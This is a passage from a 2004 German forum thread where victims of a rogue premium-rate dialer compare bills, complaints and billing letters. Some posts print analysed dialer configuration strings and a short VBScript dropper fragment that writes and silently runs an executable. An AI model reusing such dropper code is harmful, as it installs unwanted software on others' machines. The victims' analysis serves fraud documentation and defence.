R c17265a0 5f000 1000
R c17265a0 18000 1000
R c17265a0 4e000 1000
R c17265a0 12000 1000
R c17265a0 52000 1000
R c17265a0 3d000 1000
R c17265a0 17000 1000
R c17265a0 13000 1000
R c17265a0 30000 1000
R c173b910 2ce00 1000
R c173b910 2ee00 200
R c173b910 2de00 1000
o d105a200 32219 "C:\WINDOWS\SYSTEM\RASAPI32.DLL"
R d105a200 0 0
könnte es ein log File zB des 0190 warners sein , der hat bei mir  hoffendlich die verbindung unterbunden !

PS beschwerde bei Reng.TP habe ich gemacht ! so geht es ja nicht !!


----------



## Rainer (17 Mai 2004)

Hallo zusammen,

auch ich habe mir diesen fiesen Dialer eingefangen, von dessen Existenz ich erst durch Erhalt meiner Telefonrechnung erfuhr.

Bei mir waren es 2 Einwahlen am 13.04.2004. Einmal über 2:58 und einmal über 14:00 Minuten.

Die zweite Zahl macht mich stutzig, da hier einige Leute von ähnlichen Verbindungszeiten (immer so um die 14 Minuten) berichtet haben.

Das würde ja heißen, daß der Dialer eine Art "Automatik" besitzt und sich immer nach 14 Minuten abschaltet, sofern man nicht vorher z.B. den Browser schließt oder den Rechner herunter fährt.

Wenn es genügend Leute gibt, die diese Verbindungszeit ebenfalls auf ihren Einzelverbindungsnachweisen finden, wäre das in meinen Augen ein Indiz für die "Automatik" und somit für das illegale Verhalten.

Ich zumindest habe das so der Reg TP per E-Mail mitgeteilt und die haben mich kurzfristig zum Ausfüllen dieses *Formulars* aufgefordert, was ich auch eben gemacht habe.

Alle Betroffenen sollten nochmal nachschauen ob diese ominösen 14 Minuten auch bei ihnen auftauchen und ebenfalls das *Formular* mit entsprechenden Hinweisen ausfüllen.

Für mich ist das ein wichtiger Punkt, da ich vor 2 Wochen mein System neu aufspielen musste und deshalb keine weiteren Spuren mehr auf meinem Rechner habe.

Wer noch etwas wissen möchte, kann sich auch gerne der PN an mich wenden.

Gruß
Rainer


----------



## Anonymous (17 Mai 2004)

*Bin auch Opfer der 090090000928*

Hallo,

auch ich wurde Opfer eines Dialers, der die 090090000928 über das Osterwochenende angewählt hat. Im Taskmanager erschien als Verbindungsname "exdialer". Der Dialer hat sich insgesamt vier mal im Abstand von genau zwei Stunden (!!) ohne Ankündigung automatisch im Hintergrund eingewählt (Schaden: ca. 74,- Euro + MwSt). Bei den ersten beiden Malen habe ich noch gar nichts davon mitgekriegt, und die Verbindungsdauer war auch bei mir in diesen beiden Fällen ziemlich genau 14 Minuten!
Dies alles habe ich auch schon der RegTP ausführlich mitgeteilt, telefonisch und per eMail. Hab noch keine Antwort erhalten. Von dem Formular wusste ich bisher noch nichts, ich gucks mir jetzt sofort mal an.
Bei der RegTP sagte man mir auf Anfrage, dass die Nummer schon sehr gut bekannt sei und dass die Juristen der RegTP gerade ermitteln. Das Problem ist natürlich, dass der Dialer sich selbst deinstalliert. Bei mir habe ich noch nicht mal die batch-Datei, die angeblich für das Löschen des Dialers verantwortlich ist, noch irgendwelche verdächtigen Registry-Einträge gefunden. Ich kann also nichts beweisen, hoffe aber, dass die RegTP durch die vielen anderen Hinweise genug Beweise sammeln kann (selbst wenn es keine Beweis-Daten gibt, so haben sich ja offensichtlich etliche "Zeugen" gemeldet), dass die Rechnungslegung untersagt wird und die Nummer abgeschaltet wird!

Ich habe heute Widersprüche bei BT Germany und bei dieser Frau ..... in Bingen eingereicht, die man mir bei BT genannt hatte.
Mal abwarten, was zurückkommt.

Ich wünsche uns viel Erfolg im Kampf gegen diesen Dialer, bin aber, nachdem ich dieses Forum gesehen habe, einigermaßen optimistisch.

_persönliche Daten gelöscht, siehe NUB 
tf/mod_


----------



## technofreak (17 Mai 2004)

*Re: Bin auch Opfer der 090090000928*



			
				Stef schrieb:
			
		

> Ich habe heute Widersprüche bei BT Germany und bei dieser Frau ..... in Bingen
> eingereicht, die man mir bei BT genannt hatte.
> Mal abwarten, was zurückkommt.



ich würde mir von BT erläutern lassen (schriftlich), was es mit dieser ominösen Dame auf sich hat.
In der RegTP Datenbank zu dieser Nummer  ist diese Dame nicht aufgeführt. 

tf


----------



## Rainer (17 Mai 2004)

Hallo,

Rechnungs- und somit Anspruchsteller ist doch die Fa. BT. Deshalb ist es in meinen Augen unerheblich an wen die Leitung vermietet wurde.

Die BT ist beweispflichtig, daß die Leistung ordungsgemäß erbracht wurde. Und die wissen ganz genau das sie Dreck am Stecken haben.

Sie können immer wieder nur auf die Registrierung ihres Dialers verweisen, wodurch aber keinesfalls die mißbräuchliche Benutzung der Rufnummer auf anderen Wegen unmöglich ist.

Diese mißbräuchliche Benutzung könnte durch die 14-Minuten-These untermauert werden, daß auch die Angestellten und Beamten der RegTP sich diesem Sachverhalt nicht verschließen können, auch wenn weitere Beweise fehlen. Also eine Sache der Indizien, wegen denen Mörder schon rechtskräftig verurteilt wurden (auch wenn der Vergleich hinkt).

Gruß
Rainer


----------



## TSCoreNinja (18 Mai 2004)

Rainer schrieb:
			
		

> Bei mir waren es 2 Einwahlen am 13.04.2004. Einmal über 2:58 und einmal über 14:00 Minuten.
> 
> Die zweite Zahl macht mich stutzig, da hier einige Leute von ähnlichen Verbindungszeiten (immer so um die 14 Minuten) berichtet haben.


@ Rainer,

ja, der Dialer scheint eine Einwahlzeitbegrenzung zu haben. Einer der Dialer, die vom Download stammen, der in  diesem Posting (im Linkforum, nur nach Anmeldung zugaenglich) beschrieben wird, ist upx komprimiert. Entkomprimierung und 
Suche nach Strings zeigt u.a folgendes:

```
DP27Number=0088213881591
DP27Price=169
DP27Decimals=2
DP27Currency=EUR
DP27PriceType=0
DP27CountryID=212
DP27UserName=1-%AID%[email protected]@dcon
DP27Password=test
DP27ETPrice=1
DP27ETNumber=1
DP27ETAutodial=2
DP27ETLicense=1
DP27MaxOnlineTime=14
DP27MaxOnlinePrice=0
DP27OnlineShowPrice=0
DP27OnlineShowText=0
DP27URL= $CONTENTURL editiert, gegen PN
DP27IEStartURL=
DP27IEStartURLDayDelay=0
DP27NoModemURL=
DP27ETStatusWindow=3
DP27StatusWindowPos=4
DP27UninstallAfterDial=1
DP27LicenseLink=1
DP27StatusCancel=0
DP27SystemTrayStatus=0
DP27CloseBrowser=0
DP27ContentText=
DP27ConfirmDisconnect=0
DP27DisconnectDisabledTime=0
DP27ConfirmDial=0
DP27DialTimeout=0
DP27DefaultModemOnly=1
```
Viele der Parameter lassen erahnen, was die machen, und ich ahne dabei nichts gutes. Dabei wird per Default das erste Profil gewaehlt, mit einer Nummer

```
DP0Number=01033006749990121
```
Ich weiss noch nicht, wie man die anderen anspricht, aber es sind insgesamt 55 Profile gespeichert, mit lustigen Nummern in alle Welt (und nicht nur dahin, EMSAT laesst gruessen). 

Leider funktioniert entpacken mit upx nicht bei den Dialern der Nummer 0900-90000928/606, aber die Teile stinken ebenso gen Himmel. Jemand einen Tipp, wie man die Komprimierungsmethode herauskriegt? Oder einen guten Windows-Dissassembler/Debugger, der frei verfuegbar ist? 
Gr,
TSCoreNinja


----------



## harz1961 (18 Mai 2004)

*Re: Bin auch Opfer der 090090000928*



			
				Stef schrieb:
			
		

> Hallo,
> 
> 
> Ich habe heute Widersprüche bei BT Germany und bei dieser Frau ..... in Bingen eingereicht, die man mir bei BT genannt hatte.
> Mal abwarten, was zurückkommt.




Hallo,
habe auch Widerspruch bei BT eingelegt. Als Antwort kam der übliche Hinweis auf RegTP und ordentliche Registrierung etc. BT besteht deshalb auf Zahlung, weitere Einwände seien sowieso an die Betreiberin Frau S... in Bingen zu richten. 

Zwei Fragen:

Hat denn hier jemand bereits einmal eine Antwort von Frau S... erhalten??

Habe gehört. die RegTP prüft bereits die 09....928 und soll das auch veröffentlicht haben. Ich habe aber keinen offizielen Hinweis auf der RegTP-Seite gefunden, war jemand erfolgreicher??

Gruß

_persönliche Daten gelöscht siehe NUB 
http://forum.computerbetrug.de/rules.php#9
tf/mod _


----------



## Fidul (19 Mai 2004)

TSCoreNinja schrieb:
			
		

> ja, der Dialer scheint eine Einwahlzeitbegrenzung zu haben. Einer der Dialer, die vom Download stammen, der in  diesem Posting (im Linkforum, nur nach Anmeldung zugaenglich) beschrieben wird, ist upx komprimiert. Entkomprimierung und
> Suche nach Strings zeigt u.a folgendes:


Ich will ja nichts andeuten, aber die von dir geposteten ini-Teile weisen von der Struktur her eine geradezu verblüffende Ähnlichkeit mit den illegalen Produkten aus dem Hause TRTI auf, bloß etwas moderner und vielseitiger.


----------



## KlausPeter (19 Mai 2004)

@stef
klingt interessant, bei mir ist die Einwahl eher unregelmässig zwischen 6 und 50 Minuten nach Einwahl.
Achja, registriere dich bitte hier im Board.

Ansonsten habe ich per Fax BT darum gebeten, mir mal zu erklären woher die Forderungen kommen.

Gruß
Klaus


----------



## Reducal (19 Mai 2004)

KlausPeter schrieb:
			
		

> Ansonsten habe ich per Fax BT darum gebeten, mir mal zu erklären ....


...und dabei wahrscheinlich die auf der Telefonrechung angegebene Nummer verwendet. Wundere Dich nicht, wenn Du eine Antwort von der Nexnet GmbH erhältst. Die Nummer führt direkt in deren Callcenter. Die Antwort von denen interessiert hier bestimmt den einen oder anderen, also bleib´ am Ball!


----------



## harz1961 (19 Mai 2004)

> ... Die Antwort von denen interessiert hier bestimmt den einen oder anderen, also bleib´ am Ball!


Hier die Antwort, die ich von nexnet erhalten habe:

Sehr geehrter Herr ...,

vielen Dank für Ihre Mail.

Unter der Produktbezeichnung „Premium Rate Service von BT“ (Art.-Nr. 77495) wurde die Nutzung eines kostenpflichtigen Angebotes im Internet abgerechnet.

Die Verbindung ist eindeutig von Ihrem Anschluss aus zu Stande gekommen. Sie wurde entsprechend den gesetzlichen Bestimmungen über eine 09009-Rufnummer hergestellt. Der zugrunde liegende Tarif entspricht den gesetzlichen Vorgaben.

Der Dialer ist ordnungsgemäß bei der Regulierungsbehörde für Telekommunikation und Post registriert.

Die BT (Germany) GmbH & Co. oHG erbringt zwar die technische Verbindungsleistung, ist jedoch nicht selbst Anbieter des von Ihnen genutzten Dienstes.

Etwaige inhaltliche Einwände bezüglich des angebotenen Dienstes richten Sie daher bitte unter Angabe der genutzten Service-Rufnummer (090090000928) direkt an den Anbieter:

Frau D... S...
...
55411 Bingen am Rhein

Die berechneten Entgelte bestehen dem Grund und der Höhe nach zu Recht. Sie befinden sich in der Zahlungspflicht. Auch falls Sie persönlich die fraglichen Verbindungen nicht genutzt haben, ist dies für die Erhebung der Nutzungsentgelte ohne Belang und entbindet Sie als Anschlussinhaber nicht von der Pflicht, die für Sie (oder die Person, die Ihren Anschluss nutzte) erbrachten Leistungen zu bezahlen.

Es grüßt Sie
das Customer Service Team

+++++++++

NEXNET GmbH
Postfach 27 02 47
13472 Berlin

Geschäftsführer
............
Amtsgericht Berlin Charlottenburg
HRB 74625



Ich vermute, dass alle Antworten ähnlich lauten. Im Telefonat verwies der Mitarbeiter von Nexnet auch nur auf die RegTP - Regisrierung und die dadurch gegeben  Rechtmäßigkeit der Forderung.

_persönliche Daten gelöscht , siehe NUB 
http://forum.computerbetrug.de/rules.php#9
tf /mod_


----------



## Counselor (19 Mai 2004)

Es läßt sich wunderbar gegen die Abtretungserklärung zwischen Nexnet und BT Ignite wettern:
http://winfaq.redirectme.net/Nexnet/nexnet2.aspx


----------



## Rainer (19 Mai 2004)

Hallo,

heute bekam ich auch Post von nexnet. Und zwar mit dem gleichen Inhalt wie 2 Posts weiter oben.

@Counselor:
Eine Abtretungserklärung oder Handlungsvollmacht werde ich auf jeden Fall anfordern, da ich mich an die BT als Anspruchsteller gewendet habe und plötzlich von der nexnet "betreut" werde. Dann werde ich ja sehen, wie die Vollmacht aussieht.

Was ich immer noch nicht verstehe, wie nexnet auf Dritte, in diesem Fall Frau S., verweisen kann. Normalerweise ist doch immer Rechnungssteller=Anspruchsteller. Oder verstehe ich da was falsch?

Gruß
Rainer


----------



## KlausPeter (19 Mai 2004)

@Counselor
Danke, hehe, habe schon genügend Munition neben mir liegen um die Bude sturmreif zu schiessen (falls Feind mithört: natürlich nur im übertragenen Sinne) und von Tag zu Tag wird es mehr.

Von der Korrespondenz per Email halte ich nicht viel, die Purschen dürfen ruhig ein paar Briefmarken ablecken bis die Zunge nicht mehr mitmacht.

In diesem Sinne Attacke!!!

Sprüche 11, 27
Wer nach Gutem strebt, trachtet nach Gottes Wohlgefallen; wer aber das Böse sucht, dem wird es begegnen.

 0


----------



## Reducal (19 Mai 2004)

harz1961 schrieb:
			
		

> Etwaige inhaltliche Einwände bezüglich des angebotenen Dienstes richten Sie daher bitte unter Angabe der genutzten Service-Rufnummer (090090000928) direkt an den Anbieter:
> 
> Frau D... S...
> ...
> 55411 Bingen am Rhein



Ahja, und die deutsche Vertretungsberechtigte wird dann wohl auf folgenden Verantwortlichen verweisen:



			
				Datenbank der RegTP schrieb:
			
		

> microjuris.com, Inc.
> 435 North Dupont Hwy.
> Dover, DE 19903
> VEREINIGTE STAATEN VON AMERIKA




...und wenn man das Gespräch mit dem Amerikaner gefunden hat (oder der Schriftvrekehr funktioniert), dann wird man weitergereicht an den Inhalteanbieter:



			
				Datenbank der RegTP schrieb:
			
		

> Brain Solutions, Inc. - Mr. R.K. -
> 1735 Market Street Suite 413 - Melon Bank Center - Philadelphia, PA 19103-758 - USA -




...und der wir dann folgendes behaupten, was auch schon in der RegTP-Datenbank steht:



			
				Datenbank der RegTP schrieb:
			
		

> _*Installation/Wirkungsweise: *_
> 
> Der Vertragspartner bietet Ihnen entgeltlich Zugriffszeiten zu geschützten Webseiten/Daten verschiedener Anbieter mittels einer Einwahlsoftware an. Hierzu wird die vorhandene Internetverbindung zunächst getrennt und eine kostenpflichtige Verbindung über Mehrwertnummern (09009) aufgebaut. Der Zugriff auf die angebotenen Daten kann durch Verwendung jedes üblichen Internetbrowsers erfolgen. Die Inanspruchnahme der Dienstleistung endet mit Schluss der Kommunikationsverbindung, die Sie jederzeit durch Trennen der DFÜ-Verbindung herbeiführen können. Diese Dienstleistung wird jeweils einmalig und durch unmittelbare Verwendung von Fernkommunikationsmitteln erbracht. Bei Installation der Einwahl-Software erfolgen folgende Änderungen an Ihrem System: Im Verzeichnis %Windows% wird ein Ordner "DEF Connector" angelegt, in dem die Einwahlsoftware abgespeichert wird. Dieses Verzeichnis können Sie nach Deinstallation der Einwahlsoftware (Button "Deinstallation" im Menue "Einstellungen") löschen. Im %Windows% - Ordner werden 2 Dateien angelegt. "DEFConnector.ini" mit den Einstellungen der Einwahlsoftware und die Datei " DEFConnector.log" mit der Logdatei. Diese Logdatei können Sie sich jederzeit im Menue "Einstellungen" ansehen. Dort sehen Sie, welche Aktionen die Einwahlsoftware vorgenommen hat. In der Registry wird ein Eintrag für den De-Installations Dialog erzeugt und für "Windows/Systemsteuerung/Software" eingetragen um die Software zu deinstallieren, falls Sie dies wünschen. Auf dem Desktop sowie in der Programmgruppe im Start-menü wird eine Icon-Verknüpfung angelegt, damit Sie die Einwahlsoftware jederzeit ohne langwieriges suchen aktivieren können.



Die Nexnet GmbH c/o BT (Germany) GmbH & Co. OHG machen es sich einfach - man verkriecht sich hinter ungeprüften/unprüfbaren Angaben einer öffentlichen Datenbank und ist selbst ein s. g. "Mitverdiener". Standpunkt der "seriösen" deutschen Beteiligten könnte folgender sein: _...die Session kam unstrittig zu stande, da es unwiederlegbar eine potokollierte Verbindung über den Telefonanschluss des Endkunden gegeben hatte. Den technischen Ablauf entnehmen Sie bitte den Angaben in der Datenbank der RegTP._


----------



## KlausPeter (19 Mai 2004)

Schaut doch mal zu den Kollegen vom Thread "illegaler dialer 0900 / 90000606"
http://forum.computerbetrug.de/viewtopic.php?t=5408&start=30

Gruß

Klaus


----------



## Aka-Aka (20 Mai 2004)

Reducal schrieb:
			
		

> Ahja, und die deutsche Vertretungsberechtigte wird dann wohl auf folgenden Verantwortlichen verweisen:
> 
> 
> 
> ...




"in San Juan auf Puerto Rico"



			
				clubofrome schrieb:
			
		

> Active Members:
> (...)
> 
> Mr. R*** H*** C***n   Ex Governor of Puerto-Rico
> ...




quelle:  "Club of rome" (laut whois clup de rome) 


diese nicht ganz sooo ernst gemeinte Fundstelle soll dazu anregen, sich  die microjuris.com  genauer anzuschauen...


----------



## Reducal (20 Mai 2004)

http://forum.computerbetrug.de/viewtopic.php?p=55950#55950


----------



## Counselor (21 Mai 2004)

Ich zweifle gerade am Geschick eines Lesers dieser Seiten:

```
[05-21-2004 - 12:43:45] Client at 145.254.157.142: URL contains high bit character. Request will be rejected.  Site Instance='1', Raw URL='/Nexnet/Abtretungserkl%E4rung%20nexnet2.aspx_dateien/nexnet2.jpg'
[05-21-2004 - 12:43:45] Client at 145.254.157.142: URL contains high bit character. Request will be rejected.  Site Instance='1', Raw URL='/Nexnet/Abtretungserkl%E4rung%20nexnet2.aspx_dateien/nexnet3.jpg'
[05-21-2004 - 12:43:47] Client at 145.254.157.142: URL contains high bit character. Request will be rejected.  Site Instance='1', Raw URL='/Nexnet/Abtretungserkl%E4rung%20nexnet2.aspx_dateien/nexnet4.jpg'
```


----------



## Anonymous (21 Mai 2004)

Fidul schrieb:
			
		

> TSCoreNinja schrieb:
> 
> 
> 
> ...



Sorry, Fidul, deinen Beitrag hab ich überlesen... Ich sehe diese Ähnlichkeit auch und was 
 hier  noch ein typischer cicojorisch-chaostheoretischer Hinweis war, sollte mal technisch fitte Leute interessieren. Der d.exe-dialer ähnelt dem RapidSpark-Dialer, jepp. NIcht mehr und nicht weniger...

cj


----------



## Anonymous (21 Mai 2004)

Anonymous schrieb:
			
		

> Fidul schrieb:
> 
> 
> 
> ...



Ein bisschen Oel fuers Feuer:
-die Dailer werden neben dem netten XML  Exploit auch ueber einen Active X Trojaner "eu_cax.cab" installiert. Diese eu_cax.cab enthaelt einige nette Strings, genauer "Thawte Consulting" zur (Un?)Sicherheitszertifizierung,  "rapid-spark.com" und "GLOBALISED COMMUNICATIONS LIMITED". Alteingesessene Forenmitglieder koennen evt zu den Hintergruenden dieser Institutionen etwas mehr sagen, ebenso, wie die Verbindung trti - Rapidspark aussah/-sieht.
TSCoreNinja


----------



## Anonymous (21 Mai 2004)

laut symantec ist der rapidspark dialer die Datei Syscntr.exe - und genau diese Datei bekommt man, wenn man sich in Braunschweig ein Dialerbeispiel ankuckt. Er wählt sogar die entsprechende NUmmer.

Nachlesen kann man das  hier  und der entsprechende Hinweis aus der syscntr.exe ist



			
				syscntr.exe schrieb:
			
		

> DP0Number=0190829063
> DP0Price=186
> DP0Decimals=2
> DP0Currency=EUR
> ...



cj


----------



## Anonymous (26 Mai 2004)

*Re: Bin auch Opfer der 090090000928*



			
				technofreak schrieb:
			
		

> Stef schrieb:
> 
> 
> 
> ...



Ich bin genau auch an dieser Stelle (auch Opfer von xxx928 von d.exe+gamepad.exe, habe aber beide noch sicherstellen können). Folgendes macht mich aber stutzig: als Inhaltsanbieter ist Brain Solutions für die Nummer bei der RegTP eingetragen, Nextnet nennt aber die schon bekannte Dame aus Bingen. Hat sich damit nicht eigentlich jede weitere Diskussion mit Nexnet erledigt, da ja der Dialer eben nicht auf die Dame registriert ist?

Grüße Braeu


----------



## Anonymous (26 Mai 2004)

Richtigstellung

Sehr geehrte LeserInnen...

In einem posting habe ich im Zusammenhang mit der Seite www.bestinvestmentcompany.com darauf hingewiesen, dass die _e-mail-Adresse_ des admin-c ([email protected]) eine Verballhornung des _Namens_ des Admin-Cs (christian n.) sein dürfte.

Das war naheliegend wegen der assoziativen Nähe des deutschen Nachnamens mit dem in der e-mail erwähnten Namen.

Inzwischen musste ich feststellen, dass dies wohl vorschnell war. Es gibt nämlich tatsächlich eine Person mit dem namen Mike H***

Wir bitten um Entschuldigung

Cj&sons ltd.


----------



## Anonymous (27 Mai 2004)

*rapidspark gegen 090090000928 und Bingen am Rhein*

Hallo Geschädigte,


also ich hab so das Gefühl dass das Forum hier bewußt oder unbewußt ein wenig ins Leere läuft. 
Hat denn jemand nun was wirklich greifbares oder neues?
Was ich bis jetzt mitbekommen habe ist folgendes:

Dialer wählt sich unbemerkt über: 

d.exe  in C:/
oder ?
worldsex.exe in C:/Windows/System/prefetch
oder?
gamepad.exe ???

ein. Allerdings werden die beiden oberen Dateien im Zusammenhang mit anderen Dialern genannt und ich weiß nun nicht ob diese tatsächlich im Zusammenhang mit unserem Fall hier stehen.
Die beiden oberen konnte ich sicherstellen und diese sind auch äußert agressiv, wenn man sie aufruft, nur eine Nummer 090090000928 wird 
dahigehend nicht aufgerufen...Ich tappe da noch etwas im Dunkeln....
Die Gamepad.exe ist nicht zu finden bzw. ich seh noch die Möglichkeit diese Datei über eine  Unerase-Funktion zu finden....Wenn ich sie habe und die weist auf zuvor genanntes, dann kann sich der Dialer frisch machen....
Die Chancen stehen gut, da mein PC z.Z. komplett geblockt ist und nicht verwendet wird seitdem.
Beschwerde und Widerspruch bei BT ist eingereicht. Regtp fordert aber besuchte Internetseiten und die Dateien, die es ausgelöst haben könnten. Diese Forderung kommt mir ein wenig seltsam vor, denn wenn man diese Verbindungen kennen würde, hätte man es ja bemerkt. Oder?
Erbringt man diesen Nachweis nicht so verliert sich die Beschwerde im Sande. Also weitersuchen.
Wie auch immer die Regtp empfielt: sich die in diesem Zeitraum installierten Exe-Dateien genauer anzuschauen. Über die Suchfunktion mit *.exe und dem Datum der Installation auf dem Rechner.  War für die Gamepad.exe nicht erfolgreich (da wahrscheinlich gelöscht), aber die anderen konnten in diesem Zeitraum festgestellt werden.

Soooo nun meine Fragen:
Ist es tatsächlich die Gamepd.exe oder sind es die anderen Dateien?
Wer hat mehr Erfahrung als im Forum genannt bzw. ist weiter gekommen als einen Widerspruch beim Dialer oder bei der BT germany?
Wer kann Näheres zu den genannten Personen (es scheinen mehrere zu sein) in Bingen am Rhein sagen?
Was sind das für Leute? Ist es ein Firma? Ein Anwaltsbüro oder was?
Ist man rechtlich überhaupt verpflichtet an weitere Unterfirmen (z.B. NexNet) den Widerspruch weiter zu leiten, wenn man auf der Rechnung die BT stehen hat?


Für die Personen, die das hier grienend mitlesen und sich diebisch auf die Kohle freuen, die sie glauben zu bekommen, kann ich nur schreiben:
Freunde der Sonne....wir kriegen Euch! Keine Bange.

mfg
Joeke


----------



## TSCoreNinja (27 Mai 2004)

*Re: rapidspark gegen 090090000928 und Bingen am Rhein*



			
				Joeke schrieb:
			
		

> Dialer wählt sich unbemerkt über:
> d.exe  in C:/ oder ?


Ich kenn einen, der sich nach folgendem Schema einwaehlt:

```
p="c:\d1422.exe"
set s=CreateObject("Scripting.FileSystemObject")
set f=s.createTextFile(p,true)
f.write y(x)
f.close
set t=CreateObject("WScript.Shell")
t.run(p)
```
und die d1422.exe erzeugt unter 
C:/Windows/System/ShellExt eine w.exe. Aber Namen sind Schall und Rauch, das laeuft ueber 
eine Schema $DOMAIN/download/dialer/d_2.exe.php&AID=$NR, wobei dann die Datei d$NR.exe erzeugt wird. 



> Wer kann Näheres zu den genannten Personen (es scheinen mehrere zu sein) in Bingen am Rhein sagen?
> Was sind das für Leute? Ist es ein Firma? Ein Anwaltsbüro oder was?


Schau mal mein Posting hier an.


> Ist man rechtlich überhaupt verpflichtet an weitere Unterfirmen (z.B. NexNet) den Widerspruch weiter zu leiten, wenn man auf der Rechnung die BT stehen hat?


Meines Wissens nicht, aber IANAL.


> Freunde der Sonne....wir kriegen Euch! Keine Bange.


Oh, ein Optimist. Wenn Du Dein Geld behaelst, kannst Du wohl schon zufrieden sein, bei dem Aktionismus der Behoerden. Einzige Methode ist wohl ein guter Kontakt zur Presse, die RegTP scheint immer erst auf Fernsehberichte zu reagieren... 
Gr,
TSCoreNinja


----------



## Anonymous (27 Mai 2004)

*Re: rapidspark gegen 090090000928 und Bingen am Rhein*



			
				Joeke schrieb:
			
		

> d.exe  in C:/
> oder ?
> worldsex.exe in C:/Windows/System/prefetch
> oder?
> ...



Ich denke schon. Bei mir hat sich d.exe und gamepad.exe genau in dem Moment installiert (lt. Dateiinfo), als es zur Verbindung nach ...928 kam. Aufgefallen ist das nur, weil ich beim Surfen mal ein Blick in die DFÜ-Verbindungen geworfen habe und dort ein exDialer-Eintrag war.

Braeu


----------



## stef (1 Juni 2004)

*Video der automatischen Einwahl?*

Hallo,
Im Forenthread zur Nummer 090090000606 (http://forum.computerbetrug.de/viewtopic.php?t=5408) wurde von einem Video berichtet, dass die Automatische Einwahl eines Dialers mit der Rufnummer ...606 zeigt. Mir wurde auch schon per PN gesagt, wo ich mir den Dialer oder den Dialer zur Nummer ...928 herunterladen kann, das funktioniert aber bei mir nicht mehr, vielleicht wegen installierter Updates. Deshalb: Hat jemand ein Video, das auch zeigt, wie der Dialer sich bei der Nummer 090090000928 einzuwählen versucht? Oder hat jemand den Dialer gesichert und kann so ein Video als Beweis erstellen?
Ich bitte auf jeden Fall alle, die hier gesagt haben, dass sie gesicherte Daten oder andere Indizien haben, diese auch an die Regulierungsbehörde zu schicken, weil die meisten hier wegen der automatischen Deinstallation keine Beweise haben.
Auf jeden Fall sollten sich bitte alle, die betroffen sind, bei der RegTP beschweren, je mehr desto besser.

Ich habe übrigens Widersprüche an BT Germany und an die Frau ... in Bingen geschickt. NexNet hat für die BT Germany das schon bekannte Standardschreiben zurückgeschickt (Dialer sei ordnungsgemäß registriert, Zahlungspflicht, blablabla und die anderen Halbwahrheiten). Aus Bingen hab ich nocht nichts gehört. Bin mal gespannt. Was haben die anderen hier denn noch so gehört? Wie sind die Dinge bei euch weitergelaufen? Irgendwie scheinen sich die meisten aus diesem Forenthread verabschiedet zu haben, oder seid ihr noch da?


----------



## SDJungle (2 Juni 2004)

Wir sind durchaus noch da...
Derzeit bin ich noch mit der regTP zugange, zwecks Beweissicherung. Das gestaltet sich sehr mühsam da ich außer ein paar Logfiles und der entsprechenden Telefonrechnung nichts bieten konnte. Bei der BT bzw. der Adresse in Bingen habe ich mich deshalb auch noch nicht gemeldet - umgekehrt habe ich von denen allerdings auch noch nichts gelesen, gesehen oder gehört...

Gruß
Stefan


----------



## Anonymous (3 Juni 2004)

hallo liebe leidgenossen,


mich hat es auch erwischt. mit 10 € bin ich dabei.
habe das übliche angeleiert.
geld nicht überwiesen, bei der regulierungsbehörde beschwert, standardbrief von nexnet erhalten.

einige würde wegen der 10 € nicht so viel aufwand betreiben, allerdings machen mich diese machenschaften stinkewütend.
würde mich selbst als internetprofi bezeichnen, bin seit jahren über dsl per flatrate im netz. trotzdem hat es mich über die isdn karte erwischt.
vermute, dass ein virus dahintersteckt, denn auf "einschlägigen seiten" war ich definitiv nicht unterwegs.

apropos internetprofi  :bigcry: habe es tatsächlich geschafft "gamepad.exe" zu sichern und zu kopieren. profi wie ich bin, habe ich dann noch einmal eine testeinwahl unternommen, um mein zwischenzeitliches schutzprogramm zu testen. und schwupps, war auch die kopie verschwunden.  :bigcry: 
frage an die echten profis: gibt es eine chance das ding wiederzufinden?
dafür habe ich noch zwei "pf-dateien" zu bieten.
solidarische grüsse

oliver


----------



## DATAMAX (3 Juni 2004)

Hallo!

Auch ich bin mit 10 Euro dabei und vertrete auch die Meinung, das ich lieber 10 Euro für Briefmarken ausgebe, als auch nur einen müden Euro zu überweisen.

Die gamepad.exe, sowie den zugehörigen Trojaner der das Teil installiert, habe ich gesichert und könnte sie dir zuschicken.
Ich werde bei BT Einspruch einlegen mit der einfachen Begründung, dass die gamepad.exe ein nicht registrierter Dialer (Hash wert angeben) ist und damit auch keine Zahlungsanspruch besteht.
Alles andere interessiert dann ja nicht weiter (wie das Teil sich installiert hat, es sich selber löscht, usw.)
Wofür die prefetch-Dateiten (.pf) sind weiss ich allerdings auch nicht.

Ich hätte wirklich lust BT für meine Aufwendungen eine Rechnung zu schicken.


----------



## zelig1 (3 Juni 2004)

hallo datamax,

das wäre traumhaft, wenn du das machen könntest.
habe mich eben angemeldet (wegen mail-adresse).

den hashwert hatte ich auch ermittelt - war natürlich nicht registriert.
meine kommunikation mit bt läuft über fax. antworten erhalte ich per brief.
ich kann mich nur wundern, welchen aufwand die damen und herren betreiben, bzw. welche kosten das verursacht. habe alleine 4 briefe bekommen als antworten auf meine faxkommentare.
vielleicht wäre das auch einmal ein ansatzpunkt, um seinen protest umzusetzen: sich fleissig in korrespondenz zu üben.  8) :
vielleicht kann man auch so etwas druck ausüben.
die idee mit der rechnung finde ich gut und hatte es auch schon vor.
ich habe einen hohen tagessatz und immerhin wird man genötigt viel zeit für/gegen offensichtlichen ....  zu investieren.

gruss

_aus rechtlichen Gründen editiert tf/mod _
oliver


----------



## Qoppa (3 Juni 2004)

DATAMAX schrieb:
			
		

> Ich hätte wirklich lust BT für meine Aufwendungen eine Rechnung zu schicken.



Das geht leider nicht, - aber sonst kannst Du hier ja viele Anregungen für Dein weiteres Vorgehen finden. Tip: ein wenig auch in anderen Threads herumlesen, es finden sich auch viele "Musterschreiben".


----------



## neward (4 Juni 2004)

stef schrieb:
			
		

> Auf jeden Fall sollten sich bitte alle, die betroffen sind, bei der RegTP beschweren, je mehr desto besser.


Recht hast du! Hier für Unentschlossene der Link zum Beschwerde-Formular: http://www.regtp.de/imperia/md/content/mwdgesetz/FormblattBeschwerde1.pdf .
(Wurde bestimmt schon häufig gepostet, ist aber, finde ich, immer wieder sinnvoll.)



			
				SDJungle schrieb:
			
		

> Derzeit bin ich noch mit der regTP zugange, zwecks Beweissicherung. ...Das gestaltet sich sehr mühsam ... Bei der BT ... habe ich mich deshalb auch noch nicht gemeldet ...


- Beweissicherung ist gut und wichtig! Wenn sich allerdings nicht mehr viel finden lässt, nicht so wild, weil: Du musst (bei im Net nachgewiesener Existenz eines illegalen Dialers für die betreffende Nummer) nichts beweisen: siehe http://forum.computerbetrug.de/viewtopic.php?t=5408&postdays=0&postorder=asc&start=16 .
